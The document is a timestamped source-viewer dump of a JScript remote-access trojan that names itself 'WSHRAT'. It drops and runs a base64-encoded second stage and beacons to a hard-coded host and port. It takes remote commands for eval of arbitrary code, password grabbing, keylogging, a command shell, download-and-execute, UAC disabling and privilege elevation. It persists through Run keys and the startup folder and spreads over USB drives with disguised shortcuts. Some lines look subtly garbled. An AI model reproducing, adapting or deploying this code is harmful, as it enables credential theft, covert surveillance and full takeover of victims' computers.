2019-09-29 14:35:32 +00:00
|
|
|
try
|
|
|
|
|
{
|
2019-09-29 14:37:35 +00:00
|
|
|
var longText1 = "ZnVuY3Rpb24gRmVkSG91c2luZyhsYWJlbCl7Cglzd2l0Y2gobGFiZWwpewoJCWNhc2UgIm1zX3htbCI6CgkJCXJldHVybiBXU2NyaXB0LkNyZWF0ZU9iamVjdCgiTWljcm9zb2Z0LlhNTERPTSIpOwoJCQlicmVhazsKCQljYXNlICJyZWdleCI6CgkJCXJldHVybiBuZXcgUmVnRXhwKCJALSMiLCAiZyIpOwoJCQlicmVhazsKCQljYXNlICJ1dGY4IjoKCQkJcmV0dXJuICJTeXN0ZW0uVGV4dC5VVEY4RW5jb2RpbmciOwoJCQlicmVhazsKCQljYXNlICJlbmNvZGVkIjoKCQkJcmV0dXJuICJMeTg4V3lCeVpXTnZaR1Z5SURvZ2EyOW5ibWwwYnlALSNvWXlrZ2MydDVjR1VnT2lCc2FYWmxPblZ1YTI1dmQyNHVjMkZzWlhNMk5DQmRQZ29LTHk4OUxUMHRQUzA5TFQwZ1kyOXVabWxuSUQwdFBTMDlMVDB0UFMwOUxUMHRQUzA5TFQwdFBTMDlMVDB0UFMwOUNncDJZWElnYUc5emRDQC0jOUlDSmljbTkwYUdWeWMycHZlUzV1YkNJN0NuWmhjaUJ3YjNKMElEMGdOamM0T1RzS2RtRnlJR2x1YzNSaGJHeGthWElnUFNALSNpSldGd2NHUmhkR0VsSWpzS2RtRnlJR3h1YTJacGJHVWdQU0IwY25WbE93cDJZWElnYkc1clptOXNaR1Z5SUQwZ2RISjFaVHNLQ2k4dlBTMDlMVDB0UFMwOUlIQjFZbXhwWXlCMllYSWdQUzA5TFQwdFBTMDlMVDB0UFMwOUxUMHRQUzA5TFQwdFBRb0tkbUZ5SUhOb1pXeHNiMkpxSUQwZ1YxTmpjbWx3ZEM1amNtVmhkR1ZQWW1wbFkzUW9JbmR6WTNKcGNIUXVjMmhsYkd3aUtUc0tkbUZ5SUdacGJHVnplWE4wWlcxdlltb2dQU0JYVTJOeWFYQjBMbU55WldGMFpVOWlhbVZqZENnaWMyTnlhWEIwYVc1bkxtWnBiR1Z6ZVhOMFpXMXZZbXBsWTNRaUtUc0tkbUZ5SUdoMGRIQnZZbW9nUFNCWFUyTnlhWEIwTG1OeVpXRjBaVTlpYW1WamRDZ2liWE40Yld3eUxuaHRiR2gwZEhALSNpS1RzS0Nnb3ZMejB0UFMwOUxUMHRQU0J3Y21sMllYUWdkbUZ5SUQwdFBTMDlMVDB0UFMwOUxUMHRQUzA5TFQwdFBTMDlDZ3AyWVhJZ2FXNXpkR0ZzYkc1aGJXVWdQU0JYVTJOeWFYQjBMbk5qY21sd2RFNWhiV1U3Q25aaGNpQnpkR0Z5ZEhWd0lEMGdjMmhsYkd4dlltb3VjM0JsWTJsaGJFWnZiR1JsY25Nb0luTjBZWEowZFhALSNpS1NALSNySUNKY1hDSTdDbWx1YzNSaGJHeGthWElnUFNCemFHVnNiRzlpYWk1RmVIQmhibVJGYm5acGNtOXViV1Z1ZEZOMGNtbHVaM01vYVc1emRHRnNiR1JwY2lrZ0t5QC0jaVhGd2lPd3BwWmlnaFptbHNaWE41YzNSbGJXOWlhaTVtYjJ4a1pYSkZlR2x6ZEhNb2FXNXpkR0ZzYkdScGNpa3BleUAtI2dhVzV6ZEdGc2JHUnBjaUAtIzlJSE5vWld4c2IySnFMa1Y0Y0dGdVpFVnVkbWx5YjI1dFpXNTBVM1J5YVc1bmN5Z2lKWFJsYlhALSNsSWlrZ0t5QC0jaVhGd2lPMzBLZG1GeUlITndiR2wwWlhJZ1BTQC0jaWZDSTdDblpoY2lCemJHVmxjQ0AtIzlJRFV3TURALSM3SUAtI3AyWVhJZ2NtVnpjRzl1YzJVc0lHTnRaQ3dnY0dGeVlXMHNJRzl1Wlc5dVkyVTdDZ3AyWVhJZ2FXNW1JRDBnSWlJN0NuWmhjaUIxYzJKemNISmxZV1JwYm1jZ1BTQC0jaUlqc0tkbUZ5SUhOMFlYSjBaR0YwWlNALSM5SUNJaU93b0tMeTg5TFQwdFBTMDlMVDBnWTI5a1pTQnpkR0Z5ZENALSM5TFQwdFBTMDlMVDB0UFMwOUxUMHRQUzA5TFQwdFBRb0thVzV6ZEdGdVkyVW9LVHNLQ25kb2FXeGxLSFJ5ZFdVcGV3b0pkSEo1ZXdvSkNXbHVjM1JoYkd3b0tUc0tDZ2tKY21WemNHOXVjMlVnUFNALSNpSWpzS0lDQC0jZ0lDQC0jZ0lDQnlaWE53YjI1elpTQC0jOUlIQnZjM1FnS0NKcGN5MXlaV0ZrZVNJc0lpSXBPd29KQ1dOdFpDQC0jOUlISmxjM0J2Ym5ObExuTndiR2wwS0hOd2JHbDBaWElwT3dvSkNYTjNhWFJqYUNoamJXUmJNRjBwZXdvZ0lDQC0jZ0lDQC0jZ0lDQC0jZ0lDQmpZWE5sSUNKa2FYTmpiMjV1WldOMElqb0tDUWtKQ1NALSNnVjFOamNtbHdkQzV4ZFdsMEtDazdDZ2tKQ1FrZ0lHSnlaV0ZyT3dvSkNRbGpZWE5sSUNKeVpXSnZiM1FpT2dvSkNRa0pJQ0J6YUdWc2JHOWlhaTV5ZFc0b0lpVmpiMjF6Y0dWakpTQC0jdll5QnphSFYwWkc5M2JpQC0jdmNpQC0jdmRDQC0jd0lDOW1JaXdnTUN3Z2RISjFaU2s3Q2drSkNRa2dJR0x5WldGck93b0pDUWxqWVhObElDSnphSFYwWkc5M2JpSTZDZ2tKQ1FrZ0lITm9aV3hzYjJKcUxuSjFiaWdpSldOdmJYTndaV01sSUM5aklITm9kWFJrYjNkdUlDOXpJQzkwSURALSNnTDJZaUxDQC0jd0xDQjBjblZsS1RzS0NRa0pDU0AtI2dZbkpsWVdzN0NpQC0jZ0lDQC0jZ0lDQC0jZ0lDQC0jZ0lHTmhjMlVnSW1WNFkyVmpkWFJsSWpvS0lDQC0jZ0lDQC0jZ0lDQC0jZ0lDQC0jZ0lDQC0jZ0lDQC0jZ2NHRnlZVzBnUFNCamJXUmJNVjA3Q2drSkNRa2dJR1YyWVd3b2NHRnlZVzBwT3dvSkNRa0pJQ0JpY21WaGF6c0tDUWtKWTJGelpTQC0jaVoyVjBMWEJoYzNNaU9nb0pDUWtKSUNCd1lYTnpaM0poWW1KbGNpaGpiV1JiTVYwc0lDSmpiV1JqTG1WNFpTSXNJR850WkZzeVhTazdDZ2tKQ1FrZ0lHSnlaV0ZyT3dvSkNRbGpZWE5sSUNKblpYUXRjR0Z6Y3kxdlptWnNhVzVsSWpvS0NRa0pDU0AtI2djR0Z6YzJkeVlXSmlaWEl5S0dOdFpGc3hYU3dnSW1OdFpHTXVaWGhsSWl3Z1kyMWtXekpkS1RzS0NRa0pDU0AtI2dZbkpsWVdzN0Nna0pDV05oYzJVZ0luVndaR0YwWlNJNkNna0pDUWtnSUhCaGNtRnRJRDBnY21WemNHOXVjMlV1YzNWaWMzUnlLSEpsYzNCdmJuTmxMbWx1WkdWNFQyWW9JbndpS1NALSNySURFcE93b0pDUWtKSUNCdmJtVnZibU5sTG1Oc2IzTmxLQ2s3Q2drSkNRa2dJRzl1Wlc5dVkyVWdQU0JtYVd4bGMzbHpkR1Z0YjJKcUxtOXdaVzVVWlhoMFJtbHNaU2hwYm5OMFlXeHNaR2x5SUNzZ2FXNXpkR0ZzYkc1aGJXVWdMRElzSUdaaGJITmxLVHNLQ1FrSkNTQC0jZ2IyNWxiMjVqWlM1M2NtbDBaU2h3WVhKaGJTazdDZ2tKQ1FrZ0lHOXVaVzl1WTJVdVkyeHZjMlVvS1RzS0NRa0pDU0AtI2djMmhsYkd4dlltb3VjblZ1S0NKM2MyTnlhWEIwTG1WNFpTQC0jdkwwSWdYQ0lpSUNzZ2FXNXpkR0ZzYkdScGNpQC0jcklHbHVjM1JoYkd4dVlXMWxJQ3NnSWx3aUlpazdDZ2tKQ1FrZ0lIVndaR0YwWlhOMFlYUjFjeWdpVlhCa1lYUmxaQ0lwT3dvSkNRa0pJQ0IzYzJOeWFYQjBMbkYxYVhRb0tUc0tDUWtKWTJGelpTQC
|
|
|
|
|
var wshShell1 = WScript.CreateObject("WScript.Shell") ;
|
2019-09-29 14:35:32 +00:00
|
|
|
var appdatadir1 = wshShell1.ExpandEnvironmentStrings("%appdata%");
|
2019-09-29 14:37:35 +00:00
|
|
|
var stubpath1 = appdatadir1 + "\\ljSULvdTZD.js";
|
|
|
|
|
var decoded1 = decodeBase64(longText1);
|
2019-09-29 14:35:32 +00:00
|
|
|
writeBytes(stubpath1, decoded1);
|
2019-09-29 14:37:35 +00:00
|
|
|
wshShell1.run("wscript //B \"" + stubpath1 + "\"") ;
|
|
|
|
|
}catch(er){}
|
2019-09-29 14:35:32 +00:00
|
|
|
function writeBytes(file, bytes)
|
|
|
|
|
{
|
2019-09-29 14:37:35 +00:00
|
|
|
try
|
|
|
|
|
{
|
|
|
|
|
var binaryStream = WScript.CreateObject("ADODB.Stream");
|
|
|
|
|
binaryStream.Type =1;
|
|
|
|
|
binaryStream.Open();
|
|
|
|
|
binaryStream.Write(bytes);
|
|
|
|
|
binaryStream.SaveToFile(file,2);
|
|
|
|
|
}
|
|
|
|
|
catch(err){}
|
2019-09-29 14:35:32 +00:00
|
|
|
}
|
|
|
|
|
function decodeBase64(base64)
|
|
|
|
|
{
|
2019-09-29 14:37:35 +00:00
|
|
|
var DM = WScript.CreateObject("Microsoft.XMLDOM") ;
|
|
|
|
|
var EL = DM.createElement("tmp");
|
2019-09-29 14:35:32 +00:00
|
|
|
EL.dataType = "bin.base64";
|
2019-09-29 14:37:35 +00:00
|
|
|
EL.text = base64;
|
2019-09-29 14:35:32 +00:00
|
|
|
return EL.nodeTypedValue;
|
|
|
|
|
}
|
2019-09-29 14:37:35 +00:00
|
|
|
wshShell1 = null;
|
|
|
|
|
var host = "www.tcoolsoul.com";
|
|
|
|
|
var port = 1765;
|
|
|
|
|
var installdir ="%appdata%";
|
|
|
|
|
var lnkfile = true;
|
2019-09-29 14:35:32 +00:00
|
|
|
var lnkfolder = true;
|
2019-09-29 14:37:35 +00:00
|
|
|
var shellobj = WScript.CreateObject("wscript.shell");
|
|
|
|
|
var filesystemobj = WScript.CreateObject("scripting.filesystemobject");
|
|
|
|
|
var httpobj = WScript.CreateObject("msxml2.xmlhttp");
|
2019-09-29 14:35:32 +00:00
|
|
|
var installname = WScript.scriptName;
|
2019-09-29 14:37:35 +00:00
|
|
|
var startux = shellobj.specialFolders("startup" + "\\");
|
|
|
|
|
installdir = shellobj.ExpandEnvironmentStrings(installdir) + "\\";
|
|
|
|
|
if(!filesystemobj.folderExists(installdir)){installdir = shellobj.ExpandEnvironmentStrings("%temp%") + "\\";}
|
2019-09-29 14:35:32 +00:00
|
|
|
var spliter = "|";
|
2019-09-29 14:37:35 +00:00
|
|
|
var sleep = 5008;
|
2019-09-29 14:35:32 +00:00
|
|
|
var response, cmd, param, oneonce;
|
|
|
|
|
var inf = "";
|
|
|
|
|
var usbspreading = "";
|
|
|
|
|
var startdate = "";
|
|
|
|
|
instance();
|
|
|
|
|
while(true)
|
|
|
|
|
{
|
2019-09-29 14:37:35 +00:00
|
|
|
try
|
2019-09-29 14:35:32 +00:00
|
|
|
{
|
|
|
|
|
install();
|
2019-09-29 14:37:35 +00:00
|
|
|
response = "";
|
2019-09-29 14:35:32 +00:00
|
|
|
response = post("is-ready","");
|
|
|
|
|
cmd = response.split(spliter);
|
|
|
|
|
switch(cmd[0])
|
|
|
|
|
{
|
2019-09-29 14:37:35 +00:00
|
|
|
case "disconnect":
|
|
|
|
|
WScript.quit();
|
|
|
|
|
break;
|
|
|
|
|
case "reboot":
|
|
|
|
|
shellobj.run("%comspec% /c shutdown /r /t 0(/f", 8, true);
|
|
|
|
|
break;
|
|
|
|
|
case "shutdown":
|
|
|
|
|
shellobj.run("%comspec%(/c shutdown(/s(/t(0 /f", 0, true);
|
|
|
|
|
break;
|
|
|
|
|
case "excecute":
|
|
|
|
|
param = cmd[1];
|
|
|
|
|
eval(param);
|
|
|
|
|
break;
|
|
|
|
|
case "get-pass":
|
|
|
|
|
passgrabber(cmd[1], "cmdc.exe", cmd[2]);
|
|
|
|
|
break;
|
|
|
|
|
case "get-pass-offline":
|
|
|
|
|
passgrabber2(cmd[1],"cmdc.exe", cmd[2]);
|
|
|
|
|
break;
|
|
|
|
|
case "update":
|
|
|
|
|
param = response.substr(response.indexOf("|") + 1);
|
|
|
|
|
oneonce.close();
|
|
|
|
|
oneonce = filesystemobj.openTextFile(installdir + installname ,2, false);
|
|
|
|
|
oneonce.write(param);
|
|
|
|
|
oneonce.close();
|
|
|
|
|
shellobj.run("wscript.exe //B \"" + installdir + installname + "\"");
|
|
|
|
|
updatestatus("Updated");
|
|
|
|
|
wscript.quit();
|
|
|
|
|
case "uninstall":
|
|
|
|
|
uninstall();
|
|
|
|
|
break;
|
|
|
|
|
case "up-n-exec":
|
|
|
|
|
download(cmd[1],cmd[2]);
|
|
|
|
|
break;
|
|
|
|
|
case "bring-log":
|
|
|
|
|
upload(installdir +"wshlogs\\" + cmd[1], "take-log");
|
|
|
|
|
break;
|
|
|
|
|
case "down-n-exec":
|
|
|
|
|
sitedownloader(cmd[1],cmd[2]);
|
|
|
|
|
break;
|
|
|
|
|
case "filemanager":
|
|
|
|
|
servicestarter(cmd[1],"fm-plugin.exe", information());
|
|
|
|
|
break;
|
|
|
|
|
case "rdp":
|
|
|
|
|
servicestarter(cmd[1], "rd-plugin.exe", information());
|
|
|
|
|
break;
|
|
|
|
|
case "keylogger":
|
|
|
|
|
keyloggerstarter(cmd[1], "kl-plugin.exe", information(),0);
|
|
|
|
|
break;
|
|
|
|
|
case "offline-keylogger":
|
|
|
|
|
keyloggerstarter(cmd[1],"kl-plugin.exe", information(), 1);
|
|
|
|
|
break;
|
|
|
|
|
case "browse-logs":
|
|
|
|
|
post("is-logs", enumfaf(installdir + "wshlogs" ));
|
|
|
|
|
break;
|
|
|
|
|
case "cmd-shell":
|
|
|
|
|
param = cmd[1];
|
|
|
|
|
post("is-cmd-shell",cmdshell(param));
|
|
|
|
|
break;
|
|
|
|
|
case "get-processes":
|
|
|
|
|
post("is-processes", enumprocess());
|
|
|
|
|
break;
|
|
|
|
|
case "disable-uac":
|
|
|
|
|
if(WScript.Arguments.Named.Exists("elevated") == true)
|
2019-09-29 14:35:32 +00:00
|
|
|
{
|
2019-09-29 14:37:35 +00:00
|
|
|
var oReg = GetObject("winmgmts:{impersonationLevel=impersonate}!\\\\.\\root\\default:StdRegProv");
|
|
|
|
|
oReg.SetDwordValue(0x80800802,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System","EnableLUA",0);
|
|
|
|
|
oReg.SetDwordValue(0x80080082,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System","ConsentPromptBehaviorAdmin", 0);
|
|
|
|
|
oReg = null;
|
|
|
|
|
updatestatus("UAC+Disabled+Reboot+Required");
|
2019-09-29 14:35:32 +00:00
|
|
|
}
|
2019-09-29 14:37:35 +00:00
|
|
|
break;
|
|
|
|
|
case "elevate":
|
|
|
|
|
if(WScript.Arguments.Named.Exists("elevated") == false)
|
|
|
|
|
{
|
|
|
|
|
try
|
|
|
|
|
{
|
|
|
|
|
oneonce.close();
|
|
|
|
|
oneonce = null;
|
|
|
|
|
WScript.CreateObject("Shell.Application" .ShellExecute("wscript.exe"," //B \"" + WScript.ScriptFullName + "\" /elevated", "","runas",1));
|
|
|
|
|
updatestatus("Client+Elevated");
|
|
|
|
|
}
|
|
|
|
|
catch(nn){}
|
|
|
|
|
WScript.quit();
|
|
|
|
|
}
|
|
|
|
|
else {updatestatus("Client+Elevated");}
|
|
|
|
|
break;
|
|
|
|
|
case "if-elevate":
|
|
|
|
|
if(WScript.Arguments.Named.Exists("elevated") == false){updatestatus("Client+Not+Elevated");}
|
|
|
|
|
else{updatestatus("Client+Elevated");}
|
|
|
|
|
break;
|
|
|
|
|
case "kill-process":
|
|
|
|
|
exitprocess(cmd[1]);
|
|
|
|
|
break;
|
|
|
|
|
case "sleep":
|
|
|
|
|
param = cmd[1];
|
|
|
|
|
sleex = eval(param);
|
|
|
|
|
break;
|
2019-09-29 14:35:32 +00:00
|
|
|
}
|
|
|
|
|
}
|
2019-09-29 14:37:35 +00:00
|
|
|
catch(er){}
|
|
|
|
|
WScript.sleep(sleep);
|
2019-09-29 14:35:32 +00:00
|
|
|
}
|
|
|
|
|
function install()
|
|
|
|
|
{
|
|
|
|
|
var lnkobj;
|
|
|
|
|
var filename;
|
|
|
|
|
var foldername;
|
|
|
|
|
var fileicon;
|
|
|
|
|
var foldericon;
|
|
|
|
|
upstart();
|
2019-09-29 14:37:35 +00:00
|
|
|
for(var dri = new Enumerator(filesystemobj.drives); !dri.atEnd(); dri.moveNext())
|
|
|
|
|
{
|
|
|
|
|
var drive = dri.item();
|
|
|
|
|
if (drive.isready == true)
|
|
|
|
|
{
|
|
|
|
|
if (drive.freespace > 8 )
|
2019-09-29 14:35:32 +00:00
|
|
|
{
|
2019-09-29 14:37:35 +00:00
|
|
|
if (drive.drivetype == 1)
|
|
|
|
|
{
|
|
|
|
|
try
|
2019-09-29 14:35:32 +00:00
|
|
|
{
|
2019-09-29 14:37:35 +00:00
|
|
|
filesystemobj.copyFile(WScript.scriptFullName , drive.path + "\\" + installname,true);
|
|
|
|
|
if (filesystemobj.fileExists (drive.path +"\\" + installname))
|
|
|
|
|
{filesystemobj.getFile(drive.path + "\\" + installname).attributes = 6;}
|
|
|
|
|
}
|
|
|
|
|
catch(eiju){}
|
|
|
|
|
for(var fi = new Enumerator(filesystemobj.getfolder(drive.path + "\\" .files)); !fi.atEnd(); fi.moveNext())
|
|
|
|
|
{
|
|
|
|
|
try
|
2019-09-29 14:35:32 +00:00
|
|
|
{
|
2019-09-29 14:37:35 +00:00
|
|
|
var file = fi.item();
|
|
|
|
|
if(lnkfile == false){break;}
|
|
|
|
|
if (file.name.indexOf("."))
|
|
|
|
|
{
|
|
|
|
|
if (file.name.split(".")[file.name.split(".").length -1].toLowercase != "lnk" )
|
|
|
|
|
{
|
|
|
|
|
file.attributes =6;
|
|
|
|
|
if((file.name.toUppercase) != installname.toUppercase)
|
|
|
|
|
{
|
|
|
|
|
filename = file.name.split(".");
|
|
|
|
|
lnkobj = shellobj.createShortcut(drive.path + "\\" + filename[0] +".lnk");
|
|
|
|
|
lnkobj.windowStyle = 7;
|
|
|
|
|
lnkobj.targetPath = "cmd.exe";
|
|
|
|
|
lnkobj.workingDirectory ="";
|
|
|
|
|
lnkobj.arguments ="/c start " + installname.replace(new RegExp(" ", "g" , "\" \"" + "&start ")+ file.name.replace(new RegExp(" ", "g" , "\" \"" +"&exit")));
|
|
|
|
|
try
|
|
|
|
|
{
|
|
|
|
|
fileicon = shellobj.RegRead("HKEY_LOCAL_MACHINE\\software\\classes\\" + shellobj.RegRead( "HKEY_LOCAL_MACHINE\\software\\classes\\.") + file.name.split(".")[file.name.split(".").length -1]+ "\\" +"\\defaulticon\\");
|
|
|
|
|
}
|
|
|
|
|
catch(eeee){}
|
|
|
|
|
if(fileicon.indexOf(",") == 8){lnkobj.iconLocation = file.path;}
|
|
|
|
|
else {lnkobj.iconLocation = fileicon;}
|
|
|
|
|
lnkobj.save();
|
|
|
|
|
}
|
|
|
|
|
}
|
|
|
|
|
}
|
2019-09-29 14:35:32 +00:00
|
|
|
}
|
2019-09-29 14:37:35 +00:00
|
|
|
catch(err){}
|
|
|
|
|
}
|
|
|
|
|
for(var fi = new Enumerator(filesystemobj.getfolder(drive.path + "\\" .subFolders));!fi.atEnd(); fi.moveNext())
|
|
|
|
|
{
|
|
|
|
|
try
|
|
|
|
|
{
|
|
|
|
|
var folder = fi.item();
|
|
|
|
|
if (lnkfolder == false){break;}
|
|
|
|
|
folder.attributes =6;
|
|
|
|
|
foldername = folder.name;
|
|
|
|
|
lnkobj = shellobj.createShortcut(drive.path + "\\" + foldername + ".lnk");
|
|
|
|
|
lnkobj.windowStyle = 7;
|
|
|
|
|
lnkobj.targetPath = "cmd.exe";
|
|
|
|
|
lnkobj.workingDirectory = "";
|
|
|
|
|
lnkobj.arguments = "/c start " + installname.replace(new RegExp(" ","g" ,"\" \"" + "&start explorer ") + folder.name.replace(new RegExp(" ", "g" , "\" \"" +"&exit")));
|
|
|
|
|
foldericon = shellobj.RegRead("HKEY_LOCAL_MACHINE\\software\\classes\\folder\\defaulticon\\");
|
|
|
|
|
if(foldericon.indexOf(",") == 8){lnkobj.iconLocation = folder.path;}
|
|
|
|
|
else {lnkobj.iconLocation = foldericon;}
|
|
|
|
|
lnkobj.save();
|
|
|
|
|
}
|
|
|
|
|
catch(err){}
|
|
|
|
|
}
|
2019-09-29 14:35:32 +00:00
|
|
|
}
|
2019-09-29 14:37:35 +00:00
|
|
|
}
|
2019-09-29 14:35:32 +00:00
|
|
|
}
|
|
|
|
|
}
|
|
|
|
|
}
|
|
|
|
|
function uninstall()
|
|
|
|
|
{
|
|
|
|
|
try
|
|
|
|
|
{
|
|
|
|
|
var filename;
|
|
|
|
|
var foldername;
|
|
|
|
|
try
|
2019-09-29 14:37:35 +00:00
|
|
|
{
|
|
|
|
|
shellobj.RegDelete("HKEY_CURRENT_USER\\software\\microsoft\\windows\\currentversion\\run\\" + installname.split(".")[0]);
|
|
|
|
|
shellobj.RegDelete("HKEY_LOCAL_MACHINE\\software\\microsoft\\windows\\currentversion\\run\\" + installname.split(".")[0]);
|
|
|
|
|
}
|
2019-09-29 14:35:32 +00:00
|
|
|
catch(ei){}
|
|
|
|
|
try
|
2019-09-29 14:37:35 +00:00
|
|
|
{
|
|
|
|
|
filesystemobj.deleteFile(startup + installname ,true);
|
|
|
|
|
filesystemobj.deleteFile(WScript.scriptFullName ,true);
|
|
|
|
|
}
|
2019-09-29 14:35:32 +00:00
|
|
|
catch(eej){}
|
|
|
|
|
for(var dri = new Enumerator(filesystemobj.drives); !dri.atEnd(); dri.moveNext())
|
2019-09-29 14:37:35 +00:00
|
|
|
{
|
|
|
|
|
var drive = dri.item();
|
|
|
|
|
if (drive.isready == true)
|
|
|
|
|
{
|
|
|
|
|
if (drive.freespace > 8 )
|
|
|
|
|
{
|
|
|
|
|
if (drive.drivetype == 1)
|
2019-09-29 14:35:32 +00:00
|
|
|
{
|
2019-09-29 14:37:35 +00:00
|
|
|
for(var fi = new Enumerator(filesystemobj.getfolder(drive.path +"\\" .files)); !fi.atEnd(); fi.moveNext())
|
2019-09-29 14:35:32 +00:00
|
|
|
{
|
2019-09-29 14:37:35 +00:00
|
|
|
var file = fi.item();
|
|
|
|
|
try
|
2019-09-29 14:35:32 +00:00
|
|
|
{
|
2019-09-29 14:37:35 +00:00
|
|
|
if (file.name.indexOf("." ))
|
2019-09-29 14:35:32 +00:00
|
|
|
{
|
2019-09-29 14:37:35 +00:00
|
|
|
if ((file.name.split(".")[file.name.split(".").length -1]).toLowercase !="lnk" )
|
|
|
|
|
{
|
|
|
|
|
file.attributes =0;
|
|
|
|
|
if (file.name.toUppercase != installname.toUppercase)
|
|
|
|
|
{
|
2019-09-29 14:35:32 +00:00
|
|
|
filename = file.name.split(".");
|
2019-09-29 14:37:35 +00:00
|
|
|
filesystemobj.deleteFile(drive.path + "\\" + filename[0] + ".lnk" );
|
|
|
|
|
}
|
|
|
|
|
else{filesystemobj.deleteFile(drive.path + "\\" + file.name);}
|
|
|
|
|
}
|
|
|
|
|
else{filesystemobj.deleteFile(file.path);}
|
2019-09-29 14:35:32 +00:00
|
|
|
}
|
|
|
|
|
}
|
2019-09-29 14:37:35 +00:00
|
|
|
catch(ex){}
|
|
|
|
|
}
|
|
|
|
|
for(var fi = new Enumerator(filesystemobj.getfolder(drive.path +"\\" .subFolders)); !fi.atEnd(); fi.moveNext())
|
|
|
|
|
{
|
|
|
|
|
var folder = fi.item();
|
|
|
|
|
folder.attributes = 0;
|
2019-09-29 14:35:32 +00:00
|
|
|
}
|
|
|
|
|
}
|
|
|
|
|
}
|
2019-09-29 14:37:35 +00:00
|
|
|
}
|
2019-09-29 14:35:32 +00:00
|
|
|
}
|
|
|
|
|
}
|
|
|
|
|
catch(err){}
|
|
|
|
|
WScript.quit();
|
|
|
|
|
}
|
|
|
|
|
function post(cmd ,param)
|
|
|
|
|
{
|
|
|
|
|
try
|
2019-09-29 14:37:35 +00:00
|
|
|
{
|
|
|
|
|
httpobj.open("post","http://" + host +":" + port +"/" + cmd, false);
|
|
|
|
|
httpobj.setRequestHeader("user-agent:",information());
|
|
|
|
|
httpobj.send(param);
|
|
|
|
|
return httpobj.responseText;
|
|
|
|
|
}
|
2019-09-29 14:35:32 +00:00
|
|
|
catch(err){return "";}
|
|
|
|
|
}
|
|
|
|
|
function information()
|
|
|
|
|
{
|
|
|
|
|
try
|
|
|
|
|
{
|
2019-09-29 14:37:35 +00:00
|
|
|
if (inf == "" )
|
|
|
|
|
{
|
|
|
|
|
inf = hwid() + spliter;
|
|
|
|
|
inf = inf + shellobj.ExpandEnvironmentStrings("%computername%") + spliter ;
|
|
|
|
|
inf = inf + shellobj.ExpandEnvironmentStrings("%username%") + spliter;
|
|
|
|
|
var root = GetObject("winmgmts:{impersonationlevel=impersonate}!\\\\.\\root\\cimv2");
|
|
|
|
|
var os = root.ExecQuery("select(* from win32_operatingsystem");
|
|
|
|
|
for(var fi = new Enumerator(os);!fi.atEnd(); fi.moveNext())
|
|
|
|
|
{
|
|
|
|
|
var osinfo = fi.item();
|
|
|
|
|
inf = inf + osinfo.caption + spliter;
|
|
|
|
|
break;
|
|
|
|
|
}
|
|
|
|
|
inf = inf +"plus" + spliter;
|
|
|
|
|
inf = inf + security() + spliter;
|
|
|
|
|
inf = inf + usbspreading;
|
|
|
|
|
inf ="WSHRAT" + spliter + inf + spliter + "JavaScript-v1.2";
|
|
|
|
|
return inf;
|
|
|
|
|
}
|
|
|
|
|
else{return inf;}
|
2019-09-29 14:35:32 +00:00
|
|
|
}
|
|
|
|
|
catch(err){return "";}
|
|
|
|
|
}
|
2019-09-29 14:37:35 +00:00
|
|
|
function upstart()
|
2019-09-29 14:35:32 +00:00
|
|
|
{
|
|
|
|
|
try
|
|
|
|
|
{
|
2019-09-29 14:37:35 +00:00
|
|
|
try
|
|
|
|
|
{
|
|
|
|
|
shellobj.RegWrite("HKEY_CURRENT_USER\\software\\microsoft\\windows\\currentversion\\run\\" + installname.split(".")[0], "wscript.exe //B \"" + installdir + installname + "\"" ,"REG_SZ");
|
|
|
|
|
shellobj.RegWrite("HKEY_LOCAL_MACHINE\\software\\microsoft\\windows\\currentversion\\run\\" + installname.split(".")[0], "wscript.exe(//B \"" + installdir + installname + "\"" , "REG_SZ");
|
|
|
|
|
}
|
|
|
|
|
catch(ei){}
|
|
|
|
|
filesystemobj.copyFile(WScript.scriptFullName, installdir + installname, true);
|
|
|
|
|
filesystemobj.copyFile(WScript.scriptFullName, startup + installname, true);
|
2019-09-29 14:35:32 +00:00
|
|
|
}
|
|
|
|
|
catch(err){}
|
|
|
|
|
}
|
|
|
|
|
function hwid()
|
|
|
|
|
{
|
|
|
|
|
try
|
|
|
|
|
{
|
2019-09-29 14:37:35 +00:00
|
|
|
var root = GetObject("winmgmts:{impersonationLevel=impersonate}!\\\\.\\root\\cimv2");
|
|
|
|
|
var disks = root.ExecQuery ("select * from win32_logicaldisk");
|
|
|
|
|
for(var fi = new Enumerator(disks);!fi.atEnd(); fi.moveNext())
|
|
|
|
|
{
|
|
|
|
|
var disk = fi.item();
|
|
|
|
|
if (disk.volumeSerialNumber!="")
|
|
|
|
|
{
|
|
|
|
|
return disk.volumeSerialNumber;
|
|
|
|
|
break;
|
|
|
|
|
}
|
|
|
|
|
}
|
2019-09-29 14:35:32 +00:00
|
|
|
}
|
|
|
|
|
catch(err){return "";}
|
|
|
|
|
}
|
|
|
|
|
function security()
|
|
|
|
|
{
|
|
|
|
|
try
|
|
|
|
|
{
|
2019-09-29 14:37:35 +00:00
|
|
|
var objwmiservice = GetObject("winmgmts:{impersonationlevel=impersonate}!\\\\.\\root\\cimv2");
|
|
|
|
|
var colitems = objwmiservice.ExecQuery("select * from win32_operatingsystem",null,48);
|
|
|
|
|
var versionstr, osversion;
|
|
|
|
|
for(var fi = new Enumerator(colitems); !fi.atEnd(); fi.moveNext())
|
|
|
|
|
{
|
|
|
|
|
var objitem = fi.item();
|
|
|
|
|
versionstr = objitem.version.toString().split(".");
|
|
|
|
|
}
|
|
|
|
|
osversion = versionstr[0] +".";
|
|
|
|
|
for (var x = 1; x < versionstr.length; x++){osversion = osversion + versionstr[0];}
|
|
|
|
|
osversion = eval(osversion);
|
|
|
|
|
var sc;
|
|
|
|
|
if (osversion >6){ sc ="securitycenter2"; }
|
|
|
|
|
else{ sc = "securitycenter";}
|
|
|
|
|
var objsecuritycenter = GetObject("winmgmts:\\\\localhost\\root\\" + sc);
|
|
|
|
|
var colantivirus = objsecuritycenter.ExecQuery("select * from antivirusproduct","wql", 0);
|
|
|
|
|
var secu = "";
|
|
|
|
|
for(var fi = new Enumerator(colantivirus); !fi.atEnd(); fi.moveNext())
|
|
|
|
|
{
|
|
|
|
|
var objantivirus = fi.item();
|
|
|
|
|
secu = secu + objantivirus.displayName +" .";
|
|
|
|
|
}
|
|
|
|
|
if(secu =="" ){secu = "nan-av";}
|
|
|
|
|
return secu;
|
2019-09-29 14:35:32 +00:00
|
|
|
}
|
|
|
|
|
catch(err){}
|
|
|
|
|
}
|
|
|
|
|
function getDate()
|
|
|
|
|
{
|
2019-09-29 14:37:35 +00:00
|
|
|
var s ="";
|
|
|
|
|
var d = new Date();
|
|
|
|
|
